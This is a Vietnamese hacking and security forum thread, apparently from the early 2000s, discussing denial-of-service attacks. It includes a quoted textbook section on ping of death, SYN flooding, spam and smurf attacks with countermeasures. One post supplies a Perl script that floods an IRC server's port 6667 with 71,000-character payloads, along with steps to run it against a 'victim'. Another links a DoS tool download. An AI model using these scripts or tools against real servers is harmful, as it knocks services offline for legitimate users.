to NhuQuynh: Chị Quỳnh cho em hỏi, dạo gần đây em có nghiên cứu về Audit/Signature attact detection của IDS, về mặt công nghệ, cấu hình, hiệu quả, áp dụng thì hiểu rồi, nhưng cái quan trọng nhất vẩn là cơ chế audit detect của nó, chị có một bào tut nào nhỏ nhỏ không?

App co vai chuong trinh, nhung quang het roi (hack la xa^'u hehe)
Neu ban muon, len google, search keyword: syn.c hay dai loai dzi a'. co' ca do^'ng a'. Cai tool c hi khong trong vong 250 dong code thoi.

Khong biet ve mat ly thuyet lam sao ngan duoc syn/ack dos ta? Lam sao phan biet duoc cai nao la dos cai nao la connection hop le^. ??!!??!! Vi thuc chat 2 packet deu nhu nhau ma`

??????

Sequencing có thể là Incremental hoặc là Random. Dựa vào cơ chế Random Sequence "Guessing" có thể truy ra được Random, còn incremental thì dể rồi. Tùy vào loại firewall nào mà có cơ chế detect khác nhau. Còn vì sao thì em bó tay :D

Tuyệt cú mèo!

hi`hi` con DrDos cung loi hai lam cac chu' a`

cac ban ba`n ve drdos di..theo tui .thi cach tan cong nay cung loi hai la'm...nghe noi sever cua hackervn da tung bi tan cong bang cach nay do'...
the ba con oi .cho tui hoi..cach su dung tool drdos la ta phai co mot shell account a..va co ca GCC de complie no'..vay thi lam saode co cai do vay ??

1- DDoS va` QoS la` mo^.t ca'ch cu? ro^`i va` nhu+~ng hacker gio?i ho. kho^ng bao gio+` sa`i ca'ch na`y, nhu+ nhuquynh no'i la` CheckPoint co' anti-spoofing (cho^'ng DDoS) va` kho^ng tra? lo+`i nhu+~ng ca^u ho?i cu?a hacker thi` ho. chi.u tho^i (cho^'ng QoS).
Vi du.: ba.n ho?i to^i ma` to^i kho^ng tra? lo+`i thi` ba.n chi? phi' co^ng tho^i, co`n ba.n ho?i to^i ma` 1000 ngu+o+`i ho?i thi` to^i tra? lo+`i thi` tra? lo+`i hoa`i thi` to^i bi. dduo^'i thi` to^i si?u.

2- Pha^`n lo+'n thi` hacker du`ng sniffer dde^? a(n ca('p information cu?a na.n nha^n, nhu+ng ne^'u du`ng VPN (or SSL)thi` hacker chi.u, nhu+ng hie^.n gio+` co`n ra^'t nhie^`u ngu+o+`i kho^ng du`ng VPN va` ho. ddo^.t nha^.p va`o ma'y ddo' va` tie^'p ddo' tie^'n va`o trong Intranet cu?a ba.n va` tu+` ddo' ho. co' co+ ho^.i ta`n pha'. Qu'a tri`nh ra^'t co^ng phu

3- Ca'ch dda'ng so+. nha^'t la` ca`i sa^u va`o trong email va` send ddi, sa^u co' the^? a(n ca('p tin tu+'c cu?a ba.n va` co' the^? ta`n pha' ra^'t lo+'n. Nhu+ redcode, slammer,...etc.. va` ca'i ma` ca'c co^ng ty lo+'n ra^'t dda'ng so+. vi` no' sa^m nha^.p mo^.t ca'ch ra^'t dda da.ng va` kho' bie^'t tru+o+'c, vi` va^.y to^'t nha^'t pha?i du`ng anti-virus ca`i trong ma'y cu?a ba.n va` thu+o+`ng xuye^n update, nhu+ng cu~ng không ba?o dda?m la` vi` virus no' ra tru+o+'c khi la` ngu+o+`i ta pha't hie^.n dde^? cho^'ng.

Co`n ca'c ba.n muo^'n ho.c ho?i tho^ng tha.o ve^` hack thi` to^'t nha^'t ba.n ti`m kie^'m cu.m tu+` "honeypot"
Co' nghi~ ba.n dda(.t honeypot va`o trong ma'y ba.n va` cho nhu+~ng hacker ta^'n co^ng va`o ma'y ba.n va` ba.n monitor nhu+~ng ha`nh ddo^.ng ho. ta^'n co^ng ma.ng cu?a ba.n va` tu+` ddo' ba.n co' co+ ho^.i ho.c ho?i ra^'t nhie^`u tu+` real hacker.

hè hè, cho chơi với ...
a...a...á...c...h x...i...i...ì...i...i !

Hic, làm thế nào để thành 1 cool hacking.

Gởi các bạn datapool 3.3
Hy vọng các bạn phát triển thêm được nhiều cái thú vị từ bản gốc

http://packetstorm.widexs.nl/DoS/datapool3.3.tar.gz

Notes: Khoa cho thêm upload file .tar và .gz đi
achxi@

tui chả fải là hacker nhưng biết security hiệu quả , khỏi fải mất công suy nghĩ mệt, dù bạn có tấn công mạnh cỡ real hay manchester cũng không qua nỗi,,,cách khắc chống dos/ddos là về nhà ngủ , rút dây mạng ra:eek:

hihi, anh channhua thử provoke đi :D.

Chon sau xuong con khong tranh duoc nua, huong chi la rut day dt. Nhat la khi chuan bi online 24/24 khi dung ASDL

Như bạn thế thì tui cũng bó tay. Sao đợt này Các host kém ổn định thế nhỉ ????

Bạn muốn host ổn định :D.

Tiền :D

mấy anh cho em hỏi, khi dùng PHP script thì làm sao tạo fake ip. Đây chỉ là cây hỏi để biết thêm, không có ý viết chương trình hack. Em thử dùng hàm fsockopen, nhưng nó làm hết rồi, em đâu co biết gì nữa đâu. nói giúp em đi

Khì mọi người đã khoái học tập như vậy thì ... Dũng thử lôi tí hiểu biết chút ra giúp mọi người coi ... Nhưng nói trước ... Đây chỉ là 1 phần nhỏ của DDoS Attack mà tớ biết ... Có gì sai thì sorry các Mode ở đây nhé

Thực ra nếu bạn nào đã chat qua mIRC thì cũng biết về IRC server và biết về các dạng Flood bằng những đoạn text nặng và với nhiều nick cùng nói 1 lúc sẽ có thể làm đứng mạng và treo máy của bạn nếu như ai yếu .... Thực ra DDoS Attack cũng không khác là mấy chỉ khác là nó sử dụng bằng DDos với các câu lệnh của Cmd hoặc Perl ... Thường thì khi để VicTim bị treo Server thì cần phải gửi đến mạng của hacker 1 Packet khá lớn .... vào khoảng 70.000 Packet .... Có nhiều cách để bạn có thể connect đến server của Victim ví dụ như dùng Unix hoặc telnet .....

Thường thì các bạn có thể mở thẳng telnet bằng Window ... bằng cách nhấn vào biểu tượng Start ở góc trái màn hình vào Run và type cmd ....

Sau đó dùng lệnh sau để connect tới server của Victim : Telnet irc.servname.com 6667 (ở đây port mặc định thường là 6667 ... cũng có vài serv hoặc IRCd sử dụng port 23 nhưng hầu hết đều phải chạy 6667)

Tuy nhiên cái khó không phải là xâm nhập vào mạng của Victim mà là làm thế nào để gửi 1 gói packet nặng trên 70.000 Packet (tức tương đương 70.000 kí tự mà ta phải viết ra ví dụ abcd là 4 kí tự) cùng 1 lúc để có thể làm serv của Victim nặng mà dẫn đến hiện tượng tràn bug ....
Thực ra cái này bạn không thể dùng tay không để làm vì gõ đến sáng mai cũng chả làm gì được cái mạng đó .... hehhe .... vậy dùng code đi ....


#!/usr/bin/perl
use Getopt::Std;
use Socket;
getopts('s:', \%args);
if(!defined($args{s})){&usage;}
my($serv,$port,$foo,$number,$data,$buf,$in_addr,$p addr,$proto);

$foo = "A"; #Dùng kí tự A để gửi cho Victim
$number = "71000"; # Số kí tự gửi cho Victim là 71000 kí tự trong 1 lúc
$data .= $foo x $number; # Số kí tự sẽ gửi cho Victim là 71000 kí tự A
$serv = $args{s}; # bạn ghi tên serv muốn phá vào chỗ chữ s
$port = 6667; # Cổng mặc định
$buf = "$data";
$in_addr = (gethostbyname($serv))[4] || die("Error: $!\n");
$paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n");
$proto = getprotobyname('tcp') || die("Error: $!\n"); socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!");
connect(S, $paddr) ||die ("Error: $!");
select(S); $| = 1; select(STDOUT);
print S "$buf";
print S "$buf";
print("Data has been successfully sent to $serv\n");

Khè save đoạn code trên vào 1 file và đặt tên nó bất kì với đuôi là *.pl ... Ví dụ Flood.pl và .... download file activeperl về install ra ....

http://download.com.com/redir?pid=10175376&merid=53124&mfgid=53124&edId=3&siteId=4&oId=3000-2212-10175376&ontId=2212&ltype=dl_dlnow&lop=link&destUrl=%2F3001-2212-10175376.html <+++ File Activeperl


Xong đâu đó vào cmd và type dòng lệnh

c:>perl <Nơi chứa file.pl> xong ngồi chờ để connect thử vào serv của victim :)

Chúc cả nhà vui vẻ ... Have fun .... nên nhớ đừng bao giờ dùng DDos để đi phá vì không ai muốn công trình của mình bị phá hoại ....
Tớ viết ra đây chỉ mục dích tham khảo và học hỏi .... Cảm ơn ....

@Cyberguard: Lần sau bạn làm ơn gõ tiếng Việt đàng hoàng, đọc xong message của bạn muốn chóng mặt luôn à. Bạn nói sao? Dùng VPN thì hacker phải chịu chết hả? Bạn chắc không vậy? Bạn muốn dùng hệ thống của bạn làm mồi cho hacker để học cách họ đột nhập hả? Xin thưa: chỉ có hacker tay mơ (như tôi chẳng hạn :)) mới để lại dấu trên hệ đích thôi. Hacker có chỉ số IQ từ trung bình trở lên đều biết cách xóa dấu vết (tệ lắm cũng xóa gần hết). Bạn còn lại cái gì mà học?
@Boyquaycanada: Lần sau xài code của người khác thì nhớ cho tác giả một dòng tưởng nhớ nha bồ :D
Theo quan điểm của tôi, tất cả các cuộc tấn công từ chối dịch vụ (DoS) đều bẩn thỉu và đáng ghê tởm. Ðó là hành động phá hoại trắng trợn chứ không phải là hacking. Và điều mỉa mai là những kẻ gây ra đa số các cuộc DoS hao tiền tốn của đều là dân gà mờ "script-kiddies" chứ không phải của các hacker chân chính.
Dù sao cũng xin cám ơn những người đã bỏ công giới thiệu DDoS. Rất bổ ích cho nhiều bạn ở đây.

hẹ code của người khác là sao ???
Code của người nào thế bạn ?
Code này không phải của người nào và code này cũng chưa đúng hoàn toàn vì tớ dùng perl chưa tốt lắm bạn ạh
Nếu bạn nào biết chỗ sai của đoạn code này thì sửa lại cho bà con ...
Thanks

Oops, nếu là code của bạn thì xin lỗi. Tôi chỉ thấy nó hơi quen quen như là có thấy ở đâu rồi thôi.

Code đó thì có gì đâu mà phải chôm. Tự viết cũng được mà.

Chào bạn như quỳnh .
Mình nghĩ bạn dang học ở USA ,và dĩ nhiên bạn cũng hiểu dược rất nhiều về công nghệ hơn bọn mình ở việt nam phải ko ? Mình biết làm hacker có thể là ko hay lắm ,nhưng thực tế mình rất thích và dang tìm cách học hỏi thôi . Nó giống như là một sở thích ,và tất nhiên là ai đã đam mê cái gì đó thì cũng khó có thể vứt bỏ phải ko ?
Có lẽ bạn được học về công nghệ thông tin rất vững ,he he ,vậy mình mạo muội xin hỏi bạn có thể chỉ giúp mình có được ko ?
Mình rất hi vọng được làm quen với mọi người ,hom thư của mình là:love_you_us2002@yahoo.com

Dos attack dùng để tấn công các mạng cisco thôi a ! Tôi nghĩ nếu bạn tấn công vào các máy tính thì có được ích lợi gì đâu ? Nhưng tôi thực sự vẫn chưa hiểu nếu bạn dùng nó để tấn công một máy chủ ?Nếu một server bị food thì nó sẽ khởi động lại và pass của nó sẽ để o chế độ mặc định đúng ko ? -Như quỳnh -các bạn ?

DoS attack chỉ là một phương pháp tấn công qua mạng nên không lệ thuộc hay phân biệt OS hay NOS. DoS attack không có mục đích xâm nhập vào mạng để tìm kiếm thông tin hay kiểm soát hệ thống mà nhằm hạ gục hệ thống hoặc làm cho hệ thống tê liệt không còn khả năng hoạt động như thiết kế. Nó được gọi là từ chối phục vụ vì kết quả của những đợt tấn công là hệ thống sẽ không thể phục vụ những khách hàng hợp pháp của hệ thống. Thường đây là những cuộc tấn công trả thù, trừng phạt và ngay cả thử nghiệm kiến thức. Có nhiều dạng DoS khác nhau như: ping of death, SYN flooding, spamming, and smurfing...

Mỗi phương pháp tấn công có những công thức riêng và đòi hỏi kỷ thuật đơn giản hay phức tạp riêng nhưng không có một phương pháp nào có thể chứng tỏ người sử dụng nó là tay hacker cao cấp hay chỉ dành riêng cho lính mới. Một sinh viên của trường UTA đã hạ gục hệ thống của một trường tại Florida chỉ với vài dòng lệnh tạo ra một while loop. FBI tìm đến nhưng không thể tìm ra thủ phạm vì đó là phòng lab dành cho sinh viên tập tểnh với những bài tập đầu tiên. Tuy đơn giản nhưng trước đó không ai nghĩ ra, nên dù rằng DoS sử dụng những phương pháp đơn giản nhưng không có nghĩa người sử dụng nó là kém hiểu biết. Phức tạp hơn một chút thì SYN flooding tấn công cái điểm mạnh của TCP/IP là three-way handshake, cái mà khi thiết kế TCP/IP đã tạo ra thế khác biệt của TCP/IP là đảm bảo thông tin đi đến nơi về đến chốn.

Nhìn chung không có một phương pháp tấn công nào là bẩn thỉu hay cao thượng mà chỉ có mục đích của người sử dụng các phương pháp đó ra sao mà thôi. Có một manager nói rằng nếu như mọi người bỏ thời gian để tìm hiểu và tấn công người khác vào công việc thì thế giới này đã tiến bộ hơn ngày nay rất nhiều. Thực tế là cuộc sống vốn phức tạp, nếu không có những cuộc tấn công thì chưa chắc thế giới vi tính đã tiến bộ như ngày hôm nay.

information security = confidentality + integrity + availability + authentication.

3/4 của công thức trên nói về một khái niệm có lẽ rất mới không chỉ với VN mà hầu hết mọi nơi. Mục đích chính của information security là bảo vệ tài sản của cơ sở và tài sản ở đây không chỉ là phần cứng mà chủ yếu là "information". Lần đầu tiên tiếp xúc với vấn đề này tôi rất ngỡ ngàng với những định nghĩa "data owner" "asset owner" với asset là data. Downtime hay customer minutes đôi lúc lại là những thiệt hại lên đến vài triệu USD nên information security thực chất nhằm đảm bảo sự hoạt động liên tục và thông tin của cần thiết cho sự hoạt động của bất kỳ một business nào. Trong lĩnh vực công nghệ thông tin thì đầu tư cho cơ sở hạ tầng, phần cứng là rất lớn nhưng phần mềm trên nó cũng cần một lượng đầu tư không nhỏ và chi phí hoạt động đôi khi là mỗi năm chứ không phải life time như phần cứng. Tuy nhiên đầu tư cao nhất vẫn là cho việc thiết lập và trao đổi và duy trì thông tin.

Khi server bị flood được khởi động lại chỉ tạm thời cắt đứt sự tấn công nhưng ngay lập tức đường truyền lại sẽ bị nghẽn nếu như cuộc tấn công vẫn được tiếp tục. Tuy nhiên muốn bound một production box không đơn giản như bạn nghĩ. Ví dụ server của tôi bị flooding không thể hoạt động và để install patch (một trong những phương pháp giải quyết DoS) bên IT trước hết phải gọi điện cho data owner manager. Và sau đó hoặc họ phải liên lạc với tôi hoặc xếp của tôi phải liên lạc với tôi, phải có cả 3 bên vì IT chỉ là phục vụ và data manager có quyền ra lệnh nhưng ảnh hưởng đến công việc ra sao thì system manager hay admin là người trực tiếp quyết định. Downtime bao lâu phải được tính trước cũng những gì phải làm cũng như admin phải thông báo cho users ra sao....ngay cả khi chuyển sang hệ thống back-up không ảnh hưởng đến users nhưng những phần mềm liên quan phải được thông báo để điều chỉnh kịp thời. Hệ thống càng lớn thì downtime luôn là một trong những yếu tố hàng đầu được nhắc đến khi xây dựng hệ thống. Tuy nhiên còn tùy thuộc vào độ quan trọng của thông tin và sự cần thiết của từng hệ thống mà đôi khi system admin phải dựng firewall để ngăn mọi đường truyền vơi bên ngoài và trở thành một ốc đảo nhằm đảm bảo hoạt động của hãng ở mức độ duy trì khi bị tấn công. We are at war time.

Thường thì chế độ mặc định của pass không được sử dụng trong những production box. Nếu một box bị bound thì cần phải biết lý do tại sao và ai là người gây ra. Nếu để chế độ mặc định thì sẽ mất khả năng audit và từ đó không thể reponse một cách chính xác và nguy cơ xảy ra sự cố sẽ trở thành tiềm ẩn trong hệ thống.

Tuy nhiên những nhận xét trên là của riêng cá nhân tôi. Security là một vấn đề rất rộng lớn và có nhiều cách tiếp cận khác nhau. Hy vọng rằng trả lời được câu hỏi của bạn.
=============

DoS attack chỉ là một phương pháp tấn công qua mạng nên không lệ thuộc hay phân biệt OS hay NOS.

DoS hiểu theo nghĩa rộng đâu phải chỉ có flooding attack hả 7604? Cho nên phụ thuộc nhiều vào mục tiêu cần tấn công đấy.

DoS hiểu theo nghĩa rộng đâu phải chỉ có flooding attack hả 7604? Cho nên phụ thuộc nhiều vào mục tiêu cần tấn công đấy.

Deny of Service chỉ đơn giản là một cái tên gọi theo mục tiêu nhằm đạt được kết quả là hệ thống từ chối phục vụ những khách hàng của nó mà kẻ tấn công không cần phải đột nhập vào bên trong hệ thống hay nhằm lấy trộm thông tin hoặc chiếm quyền làm chủ cũng. Hậu quả của loại tấn công này thiệt hại về mặc kinh doanh mà không hoặc ít ảnh hưởng đến thiết bị hệ thống.

Flooding attack chỉ là một dạng đưa đến kết quả trên nhưng cũng chẳng có nghĩa rộng hay hẹp gì ở đây. Nó cũng không phụ thuộc vào mục tiêu cần tấn công vì bất cứ tấn công vào mạng, hệ thống hay đơn vị thì mục tiêu cũng không thay đổi. Nó bao gồm nhiều cách tấn công khác nhau nhưng mọi người thường gặp vẫn là các dạng flooding, smurf, spam. Nếu như tài liệu của Security+ chia smurf và spam ở những topic riêng thì tài liệu của network+ lại tập trung chúng lại vì theo mục tiêu....tùy theo tài liệu bạn đọc và chỗ đứng của tác giả cũng như người đọc mà định nghĩa có thay đổi khác nhau. Trên thực tế kỷ thuật cũng như toán học tuy 1+1=2 nhưng không có nghĩa chỉ có 1+1 mới bằng 2 mà có hàng ngàn cách để tạo ra 2 như 3-1 chẳng hạn. Có nhiều cách tạo ra số 2 nên cũng sẽ có nhiều định nghĩa khác nhau về nó nhưng cho đến cùng thì cũng chỉ đại diện cho một con số dùng để tính toán mà thôi. Chính vì vậy trong vấn đề an toàn mạng luôn xảy ra những cách tấn công khác nhau và luôn mới. Tuy nhiên để đối phó với sự thay đổi thường xuyên và mau chóng thì vẫn phải dựa trên những căn bản cố hữu để tạo ra những mô hình động. Vơi một hacker thì làm sao để tấn công là quan trọng nhưng với người quản trị thì cuộc tấn công vào mục đích gì lại là yếu tố đầu tiên cần tìm hiểu. Không ai có thể nói được tấn công được đề ra từ mục đích trước hay từ phương pháp trước vì có người sẽ từ mục đích mới đề ra phương pháp tấn công nhưng cũng có người chờ thời cơ có phương pháp rồi mới đi tấn công. Hễ phương pháp nào đạt được mục đích thì phương pháp đó thành công vì vậy định nghĩa kỷ thuật thì gói gọn nhưng để hiểu hết thì hầu như không có ai mà chỉ có người hiểu được những gì mình hiểu về nó.
===============

Thực ra DoS không chỉ có flooding mục tiêu, mà còn có thể được thực hiện nhờ vào các lỗi DoS trong các phần mềm chạy trên mục tiêu. Lấy ví dụ, nếu Web server trên đó có lỗi DoS chưa patch thì có thể tấn công vào đó để DoS web server. Nói DoS không phải lúc nào cũng flooding đường truyền của người ta là như vậy

7604 có vẻ được đào tạo bài bản nhỉ. Nhưng spam mà lại là một phương thức để DoS là thế nào???

Fundamentals of Network Security by John E. Canavan là một cuốn sách được đưa vào thư viện online dành cho computer association member của IEEE. Trong đó có viết:

....
Denial of Service
Denial-of-service attacks are designed to shut down or render inoperable a system or network. The goal of the denial-of-service attack is not to gain access or information but to make a network or system unavailable for use by other users. It is called a denial-of-service attack, because the end result is to deny legitimate users access to network services. Such attacks are often used to exact revenge or to punish some individual or entity for some perceived slight or injustice. Unlike real hacking, denial-of-service attacks do not require a great deal of experience, skill, or intelligence to succeed. As a result, they are usually launched by nerdy, young programmers who fancy themselves to be master hackers.

There are many different types of denial-of-service attacks. The following sections present four examples: ping of death, "synchronize sequence number" (SYN) flooding, spamming, and smurfing. These are examples only and are not necessarily the most frequently used forms of denial-of-service attacks.

Ping of Death
The ping-of-death attack, with its melodramatic name, is an example of how simple it can be to launch a denial-of-service attack once a vulnerability has been discovered. Those who originally discover a vulnerability deserve credit, but it takes no great skill or intelligence to exploit it.

To better understand how the ping of death worked or works we need to once again review some TCP/IP basics. The ping of death exploited a flaw in many vendors' implementations of ICMP. ICMP is part of the IP of TCP/IP and operates at the Internet layer using the IP datagram to deliver messages; ping is a TCP/IP command that simply sends out an IP packet to a specified IP address or host name to see if there is a response from the address or host. It is often used to determine if a host is on the network or alive. The typical ping command syntax would be

ping 145.34.35.56

or

ping www.acme.net

Many operating systems were or are vulnerable to larger-than-normal ICMP packets. As a result, specifying a large packet in a ping command can cause an overflow in some systems' internals that can result in system crashes. The command syntax would vary depending on the operating system you were using. Below are two examples, one for Windows and the other for Sun Solaris.

Windows: ping-165527-s 1 hostname

Solaris: ping -s hostname 65527

Normally it requires a flood of pings to crash a system. Moreover, from firsthand experience I have found that you are just as likely to crash the system from which you are launching the attack as you are to crash the system you are targeting. Nevertheless, the ping-of-death approach may still constitute an effective denial-of-service attack. Once this vulnerability was discovered, most vendors issued operating system patches to eliminate the problem.

SYN Flooding
SYN flooding is a denial-of-service attack that exploits the three-way handshake that TCP/IP uses to establish a connection. Basically, SYN flooding disables a targeted system by creating many half-open connections. Figure 2.6 illustrates how a typical TCP/IP connection is established.


Figure 2.6: Normal TCP/IP handshake.
In Figure 2.6, the client transmits to the server the SYN bit set. This tells the server that the client wishes to establish a connection and what the starting sequence number will be for the client. The server sends back to the client an acknowledgment (SYN-ACK) and confirms its starting sequence number. The client acknowledges (ACK) receipt of the server's transmission and begins the transfer of data.

With SYN flooding a hacker creates many half-open connections by initiating the connections to a server with the SYN number bit. However, the return address that is associated with the SYN would not be a valid address. The server would send a SYN-ACK back to an invalid address that would not exist or respond. Using available programs, the hacker would transmit many SYN packets with false return addresses to the server. The server would respond to each SYN with an acknowledgment and then sit there with the connection half-open waiting for the final acknowledgment to come back. Figure 2.7 illustrates how SYN flooding works.


Figure 2.7: SYN flooding exchange.
The result from this type of attack can be that the system under attack may not be able to accept legitimate incoming network connections so that users cannot log onto the system. Each operating system has a limit on the number of connections it can accept. In addition, the SYN flood may exhaust system memory, resulting in a system crash. The net result is that the system is unavailable or nonfunctional.

One countermeasure for this form of attack is to set the SYN relevant timers low so that the system closes half-open connections after a relatively short period of time. With the timers set low, the server will close the connections even while the SYN flood attack opens more.

SPAM
SPAM is unwanted e-mail. Anyone who has an e-mail account has received SPAM. Usually it takes the form of a marketing solicitation from some company trying to sell something we don't want or need. To most of us it is just an annoyance, but to a server it can also be used as a denial-of-service attack. By inundating a targeted system with thousands of e-mail messages, SPAM can eat available network bandwidth, overload CPUs, cause log files to grow very large, and consume all available disk space on a system. Ultimately, it can cause a system to crash.

SPAM can be used as a means to launch an indirect attack on a third party. SPAM messages can contain a falsified return address, which may be the legitimate address of some innocent unsuspecting person. As a result, an innocent person, whose address was used as the return address, may be spammed by all the individuals targeted in the original SPAM.

E-mail filtering can prevent much unwanted e-mail from getting through. Unfortunately, it frequently filters out legitimate e-mail as well.

Smurf Attack
The smurf attack is named after the source code employed to launch the attack (smurf.c). The smurf attack employs forged ICMP echo request packets and the direction of those packets to IP network broadcast addresses. The attack issues the ICMP ECHO_REQUEST to the broadcast address of another network. The attack spoofs as the source address the IP address of the system it wishes to target. Figure 2.8 illustrates how a smurf attack works.


Figure 2.8: Smurf attack.
When the systems on the network to whose broadcast address the ECHO_REQUEST is sent receive the packet with the falsified source address (i.e., the return address), they respond, flooding the targeted victim with the echo replies. This flood can overwhelm the targeted victim's network. Both the intermediate and victim's networks will see degraded performance. The attack can eventually result in the inoperability of both networks.

There are steps that the intermediate network can take to prevent from being used in this way. The steps include configuring network devices not to respond to ICMP ECHO_REQUESTs and disabling IP directed broadcasts from passing the network routers. There are really no steps that the targeted victim can take to prevent this kind of attack. The only defense is contacting the intermediate network to stop the ECHO_REQUESTs from being relayed, once an organization determines that it is the victim of an attack.

Denial-of-service attacks are the most difficult to defend against, and, of the possible attacks, they require the least amount of expertise to launch. In general, organization should monitor for anomalous traffic patterns, such as SYN-ACK but no return ACKs. Since most routers filter incoming and outgoing packets, router-based filtering is the best defense against denial-of-service attacks. Organizations should use packet filters that filter based on destination and sender address. In addition, they should always use SPAM/sendmail filters.

Keep in mind there is a tradeoff with packet and mail filtering. The filtering that is performed to detect denial-of-service attacks will slow network performance, which may frustrate an organization's end users and slow its applications. In addition, mail filtering will bounce some e-mails that really should be allowed through, which may also aggravate end users.
==================

Thực ra DoS không chỉ có flooding mục tiêu, mà còn có thể được thực hiện nhờ vào các lỗi DoS trong các phần mềm chạy trên mục tiêu. Lấy ví dụ, nếu Web server trên đó có lỗi DoS chưa patch thì có thể tấn công vào đó để DoS web server. Nói DoS không phải lúc nào cũng flooding đường truyền của người ta là như vậy

7604 có vẻ được đào tạo bài bản nhỉ. Nhưng spam mà lại là một phương thức để DoS là thế nào???

Tôi không hiểu tại sao lại có lỗi DoS trong phần mềm. Như bạn đọc ở bên trên Dos là một khái niệm về một thực trạng chứ không hề là một lỗi nào cả. Lỗi phần mềm có thể được khai thác để tạo ra cuộc tấn công nhưng gần như bất cứ một phần mềm nào cũng đều có lỗi, chỉ là sớm hay muộn và có bị tập trung để khai thác hoặc vô tình xuất hiện. Debug program luôn chiếm một phần quan trọng trong việc phát triển phần mềm. Tuy nhiên ở đây ta không nói về DOS hay phần mềm mà nói về khái niệm tổng quát hết. Nếu một máy hoặc một hệ thống hoạt động riêng rẻ thì việc tấn công mà không chạm vào hệ thống là gần như không thể. Chính vì vậy một trong những phương pháp an toàn và bảo thủ nhất để bảo vệ mạng là che dấu không cho người khác biết đến rằng mạng của mình tồn tại họăc giảm số người biết đến độ ít nhất có thể. Ngày nay phương pháp trên gần như là không thể chấp nhận nên đường truyền trở thành một phần quan trọng trong việc hoạt động của cả hệ thống mạng. Nếu như đường truyền bị đánh gục trước cổng, ngay cổng hay bên trong cổng đều dẫn đến sự tê liệt cục bộ hay hoàn tòan.

Như bạn biết về SYN Flood khai thác 3-way-handshake để tấn công như vậy 3-way-handshake có phải là lỗi của phần mềm hay lỗi khi thiết kế TCP/IP không? Đây cũng chính là câu hỏi mà tôi đã từng đưa ra và thực tế đó không phải là lỗi của thiết kế hay phần mềm gì cả mà chỉ là sự khai thác mà thôi. Như ví dụ của bạn về Web server bị tấn công, thực tế server đó cũng không có lỗi "DoS" nào cả mà chỉ đến lúc bắt đầu bị khai thác để tấn công một điểm yếu. Công việc của security và hacker cũng như trò chơi cút bắt nhằm xem ai khám phá ra được những "lỗ đen" trước. Có nhiều cách khác nhau để ngăn cản DoS tùy theo từng trường hợp và cách tiếp cận nhưng patch chính là cái căn bản nhất để sửa chửa vì nó được tạo ra bởi các nhà cung cấp phần mềm vì họ là người viết ra họ phải hiểu rõ và có nhiệm vụ làm điều đó.

Nếu nói về Spam thì có lẽ cách đây không lâu, bản thân tôi trong 3 ngày liên tục nhận trên 400 mails khác nhau từ VN vì tôi thường xuyên vào các hệ thống tại VN. Lúc đó tại North America không biết bao nhiêu hệ thống gần như bị tê liệt vì Spam. Theo truyền thống thì Mail flood sẽ làm tê liệt mail server nhưng cũng không nên rằng tất cả mail đến mạng đều phải thông qua đường truyền. Và khi đường truyền bị tràn ngập vì mail thì nó sẽ không còn khả năng phục vụ khác hàng cũng như mọi hoạt động trên mạng cục bộ. Mạng không bị chiếm dụng hay tàn phá nhưng tê liệt hoàn toàn thích hợp với khái niệm DoS. Các phương pháp cục bộ có thể đưa ra để tạm thời khắc phục nhưng ảnh hưởng không ít đến hoạt động bên ngoài nên chỉ đến khi sử dụng patch để khống chế thì vẫn không hoạt động lại bình thường dù rằng bản thân server trước đó chẳng hề có lỗi gì.

Các tài liệu khác nhau có thể được hiểu theo nhiều cách khác nhau nhưng bản chất sau cùng vẫn không thay đổi.
================

Sao đến đây là kết thúc rồi vậy hả các cao thủ tiếp tục đi chứ KID thôi theo trường phái Security nên không biết gì về cái này nay đọc thấy hay qúa sao các cao thủ lại dừng lại thế hả .... Continue ............

Flooding attack chỉ là một dạng đưa đến kết quả trên nhưng cũng chẳng có nghĩa rộng hay hẹp gì ở đây. Nó cũng không phụ thuộc vào mục tiêu cần tấn công vì bất cứ tấn công vào mạng, hệ thống hay đơn vị thì mục tiêu cũng không thay đổi. Nó bao gồm nhiều cách tấn công khác nhau nhưng mọi người thường gặp vẫn là các dạng flooding, smurf, spam. Nếu như tài liệu của Security+ chia smurf và spam ở những topic riêng thì tài liệu của network+ lại tập trung chúng lại vì theo mục tiêu....tùy theo tài liệu bạn đọc và chỗ đứng của tác giả cũng như người đọc mà định nghĩa có thay đổi khác nhau. Trên thực tế kỷ thuật cũng như toán học tuy 1+1=2 nhưng không có nghĩa chỉ có 1+1 mới bằng 2 mà có hàng ngàn cách để tạo ra 2 như 3-1 chẳng hạn. Có nhiều cách tạo ra số 2 nên cũng sẽ có nhiều định nghĩa khác nhau về nó nhưng cho đến cùng thì cũng chỉ đại diện cho một con số dùng để tính toán mà thôi. Chính vì vậy trong vấn đề an toàn mạng luôn xảy ra những cách tấn công khác nhau và luôn mới. Tuy nhiên để đối phó với sự thay đổi thường xuyên và mau chóng thì vẫn phải dựa trên những căn bản cố hữu để tạo ra những mô hình động. Vơi một hacker thì làm sao để tấn công là quan trọng nhưng với người quản trị thì cuộc tấn công vào mục đích gì lại là yếu tố đầu tiên cần tìm hiểu. Không ai có thể nói được tấn công được đề ra từ mục đích trước hay từ phương pháp trước vì có người sẽ từ mục đích mới đề ra phương pháp tấn công nhưng cũng có người chờ thời cơ có phương pháp rồi mới đi tấn công. Hễ phương pháp nào đạt được mục đích thì phương pháp đó thành công vì vậy định nghĩa kỷ thuật thì gói gọn nhưng để hiểu hết thì hầu như không có ai mà chỉ có người hiểu được những gì mình hiểu về nó.


good good



Các tài liệu khác nhau có thể được hiểu theo nhiều cách khác nhau nhưng bản chất sau cùng vẫn không thay đổi.


good good... Cho dù anh xào,anh nấu thế nào thì cơm vẫn là cơm,,..canh vẫn là canh

Chà lâu quá không ghé thấy sôi động hẳn.

Bác 7604 thầy quen, Internet Edge Router hủh :D, em là GSR 12816 nè lol.

Khái niệm DoS rất basis - denial of services. Nhưng mục đích của những người thực hiện việc DoS khác nhau !!!!

Thân chào Q, có phải là Như Quỳnh của peri... đó không ?
Rất hân hạnh được làm quen với Q. Thân !

